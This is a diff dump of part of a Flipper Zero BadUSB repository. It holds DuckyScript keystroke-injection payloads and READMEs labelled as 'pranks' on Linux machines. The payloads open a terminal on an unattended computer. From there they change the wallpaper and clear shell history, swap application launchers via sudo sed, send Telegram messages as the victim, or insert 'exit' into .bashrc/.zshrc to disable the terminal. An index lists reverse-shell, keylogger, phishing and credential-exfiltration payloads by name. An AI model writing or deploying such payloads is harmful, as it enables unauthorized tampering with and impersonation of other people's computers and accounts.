<img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/gif/flipper_zero%20(15).gif?raw=true" width="209" /><br><img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/DISCLAIMER.png?raw=true" width="600" />
</div>
## Description
A script used to prank your friends changing their desktop wallpaper.
Opens a shell, download the image, define the local image path, run a command KDE BASED that will replace the desktop wallpaper with the local image path, then delete the image downloaded, clear the history and close the shell.
## Getting Started
### Dependencies
* Internet Connection
* Linux KDE
### Executing program
* Plug in your device
### Settings
- Image link
- Local image path
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
GNU-Linux/Prank/ChangeDesktopWallpaper_LinuxKDE/payloads.txt
+41
View File
@@ -0,0 +1,41 @@
REM ###########################################
REM # |
REM # Title : Change Desktop Wallpaper |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Prank |
REM # Target : Linux (KDE based) |
REM # |
REM ###########################################
REM Requirements:
REM - Internet Connection
DELAY 1000
CTRL-ALT t
DELAY 2000
REM Replace 'example.com/IMAGE_NAME' with your image link
STRING wget example.com/IMAGE_NAME
ENTER
REM It depends by the Internet Connection
DELAY 2000
STRING qdbus org.kde.plasmashell /PlasmaShell org.kde.PlasmaShell.evaluateScript 'var allDesktops = desktops();for (i=0;i<allDesktops.length;i++) {d = allDesktops[i]; d.wallpaperPlugin = "org.kde.image";d.currentConfigGroup = Array("Wallpaper", "org.kde.image", "General");d.writeConfig("Image", "
REM
REM Replace example.jpg with the image path, for example /home/USERNAME/example.jpg
REM
STRING file://example.jpg
STRING ")}'
ENTER
DELAY 1000
STRING rm -rf
REM
REM Replace example.jpg with the image path, for example /home/USERNAME/example.jpg
REM
STRING file://example.jpg
STRING ;history -c; exit;
ENTER
GNU-Linux/Prank/Change_The_App_That_Will_Be_Runned/Change_The_App_That_Will_Be_Runned.gif
BIN
View File
Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 8.9 MiB

GNU-Linux/Prank/Change_The_App_That_Will_Be_Runned/README.md
+105
View File
@@ -0,0 +1,105 @@
# Change The App That Will Be Runned
A script used to prank your friends editing the deafault exec operation of desktop files running other app of wich is clicked confusing the user.
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
**Category**: Prank
<div align=center>
<img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/logo-repository-2_0.gif" width="600" /><br><img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/DISCLAIMER.png" width="600" />
</div>
![GIF](Change_The_App_That_Will_Be_Runned.gif)
## Description
A script used to prank your friends editing the deafault exec operation of desktop files running other app of wich is clicked confusing the user.
The script will run a shell in wich it will mix 2 application
## Getting Started
### Dependencies
* sudo permissions
* Original desktop file names and exec commands
* The apps must be installed in the target
### Settings
- Set the desktop file name, i.e. for Signal it is `/usr/share/applications/signal-desktop` and the exec command is `/opt/Signal/signal-desktop --no-sandbox %U`
```DuckyScript
DEFINE ORIGINAL_DESKTOP_FILE_NAME_1 example
DEFINE ORIGINAL_DESKTOP_EXEC_COMMAND_1 example
DEFINE ORIGINAL_DESKTOP_FILE_NAME_2 example
DEFINE ORIGINAL_DESKTOP_EXEC_COMMAND_2 example
```
### Example
- Config
```DuckyScript
DEFINE ORIGINAL_DESKTOP_FILE_NAME_1 /usr/share/applications/code-oss.desktop
DEFINE ORIGINAL_DESKTOP_EXEC_COMMAND_1 /usr/lib/code-oss/code-oss --unity-launch %F
DEFINE ORIGINAL_DESKTOP_FILE_NAME_2 firefox-esr.desktop
DEFINE ORIGINAL_DESKTOP_EXEC_COMMAND_2 /usr/lib/firefox-esr/firefox-esr %u
```
- Content of ORIGINAL_DESKTOP_FILE_NAME_1
```DuckyScript
[Desktop Entry]
Exec=/usr/lib/code-oss/code-oss --unity-launch %F
...
```
- Content of ORIGINAL_DESKTOP_FILE_NAME_2
```DuckyScript
[Desktop Entry]
Exec=Exec=/usr/lib/firefox-esr/firefox-esr %u
...
```
- Result
```Shell
$ cat /usr/share/applications/code-oss.desktop
[Desktop Entry]
Exec=Exec=/usr/lib/firefox-esr/firefox-esr %u
# ...
$ cat /usr/share/applications/firefox-esr.desktop
[Desktop Entry]
Exec=Exec=/usr/lib/code-oss/code-oss --unity-launch %F
# ...
```
![GIF](Change_The_App_That_Will_Be_Runned.gif)
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
GNU-Linux/Prank/Change_The_App_That_Will_Be_Runned/payload.txt
+46
View File
@@ -0,0 +1,46 @@
REM #######################################################
REM # |
REM # Title : Change The App That Will Be Runned |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Prank |
REM # Target : GNU/Linux (Debian based tested) |
REM # |
REM #######################################################
REM Requirements:
REM - sudo permissions
REM You must know the original desktop name file, if you don't know it you can rich this information download the app on you system and going to /usr/share/applications/ searching this one app, i.e. the desktop file name of Signal application is signal-desktop.desktop, so in this case you should put signal-desktop.desktop
DEFINE ORIGINAL_DESKTOP_FILE_NAME_1 example
DEFINE ORIGINAL_DESKTOP_EXEC_COMMAND_1 example
DEFINE ORIGINAL_DESKTOP_FILE_NAME_2 example
DEFINE ORIGINAL_DESKTOP_EXEC_COMMAND_2 example
REM sudo permissions needed
DEFINE SUDO example
REM Open a shell
DELAY 2000
CTRL-ALT t
DELAY 1000
STRING sudo sed -i '/^Exec=/s/.*/
STRING ORIGINAL_DESKTOP_EXEC_COMMAND_2
STRING /'
STRINGLN ORIGINAL_DESKTOP_FILE_NAME_1
DELAY 500
STRING SUDO
ENTER
DELAY 4000
STRING sudo sed -i '/^Exec=/s/.*/
STRING ORIGINAL_DESKTOP_EXEC_COMMAND_1
STRING /'
STRINGLN ORIGINAL_DESKTOP_FILE_NAME_2
DELAY 1000
ALT f4
GNU-Linux/Prank/SendTelegramMessages_Linux/README.md
+59
View File
@@ -0,0 +1,59 @@
# Send Telegram Messages - Linux
A script used to prank your friends sending messages by using Telegram app.
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
**Category**: Prank
## Disclaimer
<div align=center>
<img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/gif/flipper_zero%20(15).gif?raw=true" width="209" /><br><img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/DISCLAIMER.png?raw=true" width="600" />
</div>
## Description
A script used to prank your friends sending messages by using Telegram app.
Opens a shell, runs the telegram-desktop app, search the user by the id, enter into the chat, write the message(s) and send, then close the app and the shell.
## Getting Started
### Dependencies
* Internet Connection
* telegram-desktop installed and activated
### Executing program
* Plug in your device
### Settings
- Telegram username
- Messages
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
GNU-Linux/Prank/SendTelegramMessages_Linux/payload.txt
+43
View File
@@ -0,0 +1,43 @@
REM #########################################
REM # |
REM # Title : Send Telegram Messages |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Prank |
REM # Target : Linux |
REM # |
REM #########################################
REM Requirements:
REM - Internet Connection
REM - telegram-desktop installed and activated
DELAY 1000
CTRL-ALT t
DELAY 2000
STRING telegram-desktop
ENTER
REM It depends by the computer...
DELAY 3000
REM Define the message receiver username
STRING @example
ENTER
DELAY 500
REM Define the message(s)
STRING example
ENTER
DELAY 500
REM other messages here...
REM ...
REM ...
REM Closing Telegram App and the Shell
ALT F4
DELAY 500
CTRL c
DELAY 500
ALT F4
GNU-Linux/Prank/This_damn_shell_doesn_t_work___so_sad!-KALI/1.gif
BIN
View File
Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 1.9 MiB

GNU-Linux/Prank/This_damn_shell_doesn_t_work___so_sad!-KALI/README.md
+56
View File
@@ -0,0 +1,56 @@
# This Damn Shell Doesn't Work, SO SAD! :C
This payload can be used to prank your friends so that when they open their terminal it will close immediately.
**Category**: Prank
![](1.gif)
## Disclaimer
<div align=center>
<img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/gif/flipper_zero%20(15).gif?raw=true" width="209" /><br><img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/DISCLAIMER.png?raw=true" width="600" />
</div>
## Dependencies
* Nothing <3
## Description
The described payload aims to modify the configuration file of the default shell environment in a Linux system, specifically the `.bashrc` file. This file is executed every time a user opens a terminal or a Bash shell session. By inserting the `exit` command as the first line in the `.bashrc` file, it causes the shell to terminate immediately upon opening, preventing the user from executing any further commands or operations within the shell.
However, it's important to note that starting from version 2020.4, Kali Linux has changed its default shell from Bash to Zsh \[1] for users installing this distribution. Consequently, the main configuration file is no longer `.bashrc` but `.zshrc`. Therefore, if the target is a Kali Linux machine with this version or later, it's necessary to modify the `.zshrc` file instead of `.bashrc`.
To use this payload correctly, it is important to choose the correct one based on the target. If the target system is **Kali Linux** and if it is using Zsh as the default shell, the correct payload is [this one here](), otherwise if it is classic linux distributions like **Ubuntu** or **Debian** it is recommended to use [this one here]().
To restore proper shell operation, it will be necessary to edit via a text editor the `.bashrc` or `.zshrc` file by deleting the first line that consists of the command `exit`.
## Read More
- \[1] [Kali Linux 2020.4 switches the default shell from Bash to ZSH
](https://www.bleepingcomputer.com/news/linux/kali-linux-20204-switches-the-default-shell-from-bash-to-zsh/)
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
GNU-Linux/Prank/This_damn_shell_doesn_t_work___so_sad!-KALI/payload.txt
+29
View File
@@ -0,0 +1,29 @@
REM ############################################################
REM # #
REM # Title : This damn shell doesn't work, SO SAD! :C #
REM # Author : Aleff #
REM # Version : 1.0 #
REM # Category : Prank #
REM # Target : Kali Linux #
REM # #
REM ############################################################
REM Requirements:
REM - Nothing <3
DELAY 1000
CTRL-ALT t
DELAY 2000
STRING echo "exit" > .tmp
ENTER
DELAY 500
STRING cat .zshrc >> .tmp
ENTER
DELAY 500
STRING mv .tmp >> .zshrc
ENTER
DELAY 500
ALT F4
GNU-Linux/Prank/This_damn_shell_doesn_t_work___so_sad!-LINUX/1.gif
BIN
View File
Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 1.9 MiB

GNU-Linux/Prank/This_damn_shell_doesn_t_work___so_sad!-LINUX/README.md
+58
View File
@@ -0,0 +1,58 @@
# This Damn Shell Doesn't Work, SO SAD! :C
This payload can be used to prank your friends so that when they open their terminal it will close immediately.
**Category**: Prank
*How it works on Kali Linux...*
![](1.gif)
## Disclaimer
<div align=center>
<img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/gif/flipper_zero%20(15).gif?raw=true" width="209" /><br><img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/DISCLAIMER.png?raw=true" width="600" />
</div>
## Dependencies
* Nothing <3
## Description
The described payload aims to modify the configuration file of the default shell environment in a Linux system, specifically the `.bashrc` file. This file is executed every time a user opens a terminal or a Bash shell session. By inserting the `exit` command as the first line in the `.bashrc` file, it causes the shell to terminate immediately upon opening, preventing the user from executing any further commands or operations within the shell.
However, it's important to note that starting from version 2020.4, Kali Linux has changed its default shell from Bash to Zsh \[1] for users installing this distribution. Consequently, the main configuration file is no longer `.bashrc` but `.zshrc`. Therefore, if the target is a Kali Linux machine with this version or later, it's necessary to modify the `.zshrc` file instead of `.bashrc`.
To use this payload correctly, it is important to choose the correct one based on the target. If the target system is **Kali Linux** and if it is using Zsh as the default shell, the correct payload is [this one here](), otherwise if it is classic linux distributions like **Ubuntu** or **Debian** it is recommended to use [this one here]().
To restore proper shell operation, it will be necessary to edit via a text editor the `.bashrc` or `.zshrc` file by deleting the first line that consists of the command `exit`.
## Read More
- \[1] [Kali Linux 2020.4 switches the default shell from Bash to ZSH
](https://www.bleepingcomputer.com/news/linux/kali-linux-20204-switches-the-default-shell-from-bash-to-zsh/)
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
GNU-Linux/Prank/This_damn_shell_doesn_t_work___so_sad!-LINUX/payload.txt
+29
View File
@@ -0,0 +1,29 @@
REM ############################################################
REM # #
REM # Title : This damn shell doesn't work, SO SAD! :C #
REM # Author : Aleff #
REM # Version : 1.0 #
REM # Category : Prank #
REM # Target : Linux #
REM # #
REM ############################################################
REM Requirements:
REM - Nothing <3
DELAY 1000
CTRL-ALT t
DELAY 2000
STRING echo "exit" > .tmp
ENTER
DELAY 500
STRING cat .bashrc >> .tmp
ENTER
DELAY 500
STRING mv .tmp >> .bashrc
ENTER
DELAY 500
ALT F4
GNU-Linux/README.md
+88
View File
@@ -0,0 +1,88 @@
# My Flipper Shits - GNU/Linux
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits) [![GitHub Sponsor](https://img.shields.io/github/sponsors/aleff-github?label=Sponsor&logo=GitHub&style=for-the-badge)](https://github.com/sponsors/aleff-github) [![Licence](https://img.shields.io/badge/Licence-GPLv3-%239e264c?style=for-the-badge)](https://github.com/aleff-github/my-flipper-shits/blob/main/LICENCE)
* [Disclaimer](#disclaimer)
* [PlugAndPlay (PAP) Legend](#plugandplay-pap-legend)
* [Payloads](#payloads)
* [Videos](#videos)
* [FAQs](#faqs)
* [Credits](#credits)
* [Donations](#donations)
## Disclaimer
<div align=center>
<img src="https://raw.githubusercontent.com/aleff-github/my-flipper-shits/main/img/logo-repository-2_0.gif" width="600" /><br><img src="https://raw.githubusercontent.com/aleff-github/my-flipper-shits/main/img/DISCLAIMER.png" width="600" />
</div>
## PlugAndPlay (PAP) Legend
- 🟢 Totally - You must do nothing
- 🟡 Partial - Just something like a Dropbox Token or Discord Webhook...
- 🔴 Manual effort request
## Payloads
|System|Category|Name|PAP|
|--|--|--|--|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Indicent Response|[Auto-Check Cisco IOS XE Backdoor based on CVE-2023-20198 and CVE-2023-20273](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Incident_Response/Auto-Check_Cisco_IOS_XE_Backdoor_based_on_CVE-2023-20198_and_CVE)|🔴|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Indicent Response|[Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Incident_Response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966)|🔴|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Exfiltration|[Exfiltrate Process Info - Linux](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Exfiltration/ExfiltrateProcessInfo_Linux)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Exfiltration|[Exfiltrate Network Traffic](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Exfiltration/ExfiltrateNetworkTraffic_Linux)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Exfiltration|[Exfiltrate Linux Documents](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Exfiltration/ExfiltrateDocumentsFolder_Linux)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Exfiltration|[Exfiltrate Linux Logs](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Exfiltration/ExfiltrateLogFiles_Linux)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Exfiltration|[Exfiltrate Network Configuration](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Exfiltration/ExfiltrateNetworkConfiguration_Linux)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Exfiltration|[Exfiltrate Email And Password By Phising](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Exfiltration/ExfiltrateEmailAndPasswordByPhising_Linux)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Exfiltration|[Exfiltrate Sudo Password By Phishing](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Exfiltration/ExfiltrateSudoPasswordByPhising_Linux)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Exfiltration|[Exfiltrate WiFi Passwords](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Exfiltration/ExfiltrateWiFiPasswords_Linux)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Exfiltration|[Exfiltrate Photos Through Shell](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Exfiltration/ExfiltratePhotosThroughShell)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Phising|[Standard Phishing Attack](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Phising/StandardPhishingAttack_Linux)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Phising|[Standard Phishing Payload Using kdialog](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Phising/StandardPhishingPayloadUsingKdialog_Linux)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Execution|[Set An Arbitrary And Persistent Tor Circuit](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Execution/Set_An_Arbitrary_And_Persistent_Tor_Circuit)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Execution|[Exploiting An Executable File](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Execution/ExploitingAnExecutableFile)|🟢|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Execution|[Change MAC Address](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Execution/ChangeMacAddress_Linux)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Execution|[Set Arbitrary VPN](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Execution/SetArbitraryVPN_Linux)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Execution|[Change Network Configuration](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Execution/ChangeNetworkConfiguration_Linux)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Execution|[Edit The Default Real App With An Arbitrary](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Execution/Edit_The_Default_Real_App_With_An_Arbitrary)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Execution|[Change Git Remote Link](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Execution/ChangeGitRemoteLink)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Execution|[Persistent Reverse Shell - Telegram Based](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Execution/Persistent_Reverse_Shell-Telegram_Based)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Execution|[Telegram Persistent Connection Linux](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Execution/Telegram_Persistent_Connection_Linux)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Execution|[Persistent Keylogger - Telegram Based](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Execution/Persistent_Keylogger-Telegram_Based)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Execution|[Defend yourself against AtlasVPN bugdoor](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Execution/Defend_yourself_against_AtlasVPN_bugdoor)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)**KDE**|Prank|[Change Desktop Wallpaper](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Prank/ChangeDesktopWallpaper_LinuxKDE)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Prank|[Send Telegram Messages](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Prank/SendTelegramMessages_Linux)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Prank|[Change The App That Will Be Runned](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Prank/Change_The_App_That_Will_Be_Runned)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Prank|[Send Email Through Thunderbird](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Prank/SendEmailThroughThunderbird)|🟢|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Prank|[(Kali Linux) This_damn_shell_doesn_t_work___so_sad!](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Prank/This_damn_shell_doesn_t_work___so_sad!-KALI)|🟢|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Prank|[(Linux) This_damn_shell_doesn_t_work___so_sad!](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Prank/This_damn_shell_doesn_t_work___so_sad!-LINUX)|🟢|
|//|Prank|[Flipper Zero GIF](img/gif)|🟢|
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://raw.githubusercontent.com/aleff-github/aleff-github/main/img/github.png width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://raw.githubusercontent.com/aleff-github/aleff-github/main/img/linkedin.png width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
LICENCE
+674
View File
@@ -0,0 +1,674 @@
GNU GENERAL PUBLIC LICENSE
Version 3, 29 June 2007
Copyright (C) 2007 Free Software Foundation, Inc. <https://fsf.org/>
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.
Preamble
The GNU General Public License is a free, copyleft license for
software and other kinds of works.
The licenses for most software and other practical works are designed
to take away your freedom to share and change the works. By contrast,
the GNU General Public License is intended to guarantee your freedom to
share and change all versions of a program--to make sure it remains free
software for all its users. We, the Free Software Foundation, use the
GNU General Public License for most of our software; it applies also to
any other work released this way by its authors. You can apply it to
your programs, too.
When we speak of free software, we are referring to freedom, not
price. Our General Public Licenses are designed to make sure that you
have the freedom to distribute copies of free software (and charge for
them if you wish), that you receive source code or can get it if you
want it, that you can change the software or use pieces of it in new
free programs, and that you know you can do these things.
To protect your rights, we need to prevent others from denying you
these rights or asking you to surrender the rights. Therefore, you have
certain responsibilities if you distribute copies of the software, or if
you modify it: responsibilities to respect the freedom of others.
For example, if you distribute copies of such a program, whether
gratis or for a fee, you must pass on to the recipients the same
freedoms that you received. You must make sure that they, too, receive
or can get the source code. And you must show them these terms so they
know their rights.
Developers that use the GNU GPL protect your rights with two steps:
(1) assert copyright on the software, and (2) offer you this License
giving you legal permission to copy, distribute and/or modify it.
For the developers' and authors' protection, the GPL clearly explains
that there is no warranty for this free software. For both users' and
authors' sake, the GPL requires that modified versions be marked as
changed, so that their problems will not be attributed erroneously to
authors of previous versions.
Some devices are designed to deny users access to install or run
modified versions of the software inside them, although the manufacturer
can do so. This is fundamentally incompatible with the aim of
protecting users' freedom to change the software. The systematic
pattern of such abuse occurs in the area of products for individuals to
use, which is precisely where it is most unacceptable. Therefore, we
have designed this version of the GPL to prohibit the practice for those
products. If such problems arise substantially in other domains, we
stand ready to extend this provision to those domains in future versions
of the GPL, as needed to protect the freedom of users.
Finally, every program is threatened constantly by software patents.
States should not allow patents to restrict development and use of
software on general-purpose computers, but in those that do, we wish to
avoid the special danger that patents applied to a free program could
make it effectively proprietary. To prevent this, the GPL assures that
patents cannot be used to render the program non-free.
The precise terms and conditions for copying, distribution and
modification follow.
TERMS AND CONDITIONS
0. Definitions.
"This License" refers to version 3 of the GNU General Public License.
"Copyright" also means copyright-like laws that apply to other kinds of
works, such as semiconductor masks.
"The Program" refers to any copyrightable work licensed under this
License. Each licensee is addressed as "you". "Licensees" and
"recipients" may be individuals or organizations.
To "modify" a work means to copy from or adapt all or part of the work
in a fashion requiring copyright permission, other than the making of an
exact copy. The resulting work is called a "modified version" of the
earlier work or a work "based on" the earlier work.
A "covered work" means either the unmodified Program or a work based
on the Program.
To "propagate" a work means to do anything with it that, without
permission, would make you directly or secondarily liable for
infringement under applicable copyright law, except executing it on a
computer or modifying a private copy. Propagation includes copying,
distribution (with or without modification), making available to the
public, and in some countries other activities as well.
To "convey" a work means any kind of propagation that enables other
parties to make or receive copies. Mere interaction with a user through
a computer network, with no transfer of a copy, is not conveying.
An interactive user interface displays "Appropriate Legal Notices"
to the extent that it includes a convenient and prominently visible
feature that (1) displays an appropriate copyright notice, and (2)
tells the user that there is no warranty for the work (except to the
extent that warranties are provided), that licensees may convey the
work under this License, and how to view a copy of this License. If
the interface presents a list of user commands or options, such as a
menu, a prominent item in the list meets this criterion.
1. Source Code.
The "source code" for a work means the preferred form of the work
for making modifications to it. "Object code" means any non-source
form of a work.
A "Standard Interface" means an interface that either is an official
standard defined by a recognized standards body, or, in the case of
interfaces specified for a particular programming language, one that
is widely used among developers working in that language.
The "System Libraries" of an executable work include anything, other
than the work as a whole, that (a) is included in the normal form of
packaging a Major Component, but which is not part of that Major
Component, and (b) serves only to enable use of the work with that
Major Component, or to implement a Standard Interface for which an
implementation is available to the public in source code form. A
"Major Component", in this context, means a major essential component
(kernel, window system, and so on) of the specific operating system
(if any) on which the executable work runs, or a compiler used to
produce the work, or an object code interpreter used to run it.
The "Corresponding Source" for a work in object code form means all
the source code needed to generate, install, and (for an executable
work) run the object code and to modify the work, including scripts to
control those activities. However, it does not include the work's
System Libraries, or general-purpose tools or generally available free
programs which are used unmodified in performing those activities but
which are not part of the work. For example, Corresponding Source
includes interface definition files associated with source files for
the work, and the source code for shared libraries and dynamically
linked subprograms that the work is specifically designed to require,
such as by intimate data communication or control flow between those
subprograms and other parts of the work.
The Corresponding Source need not include anything that users
can regenerate automatically from other parts of the Corresponding
Source.
The Corresponding Source for a work in source code form is that
same work.
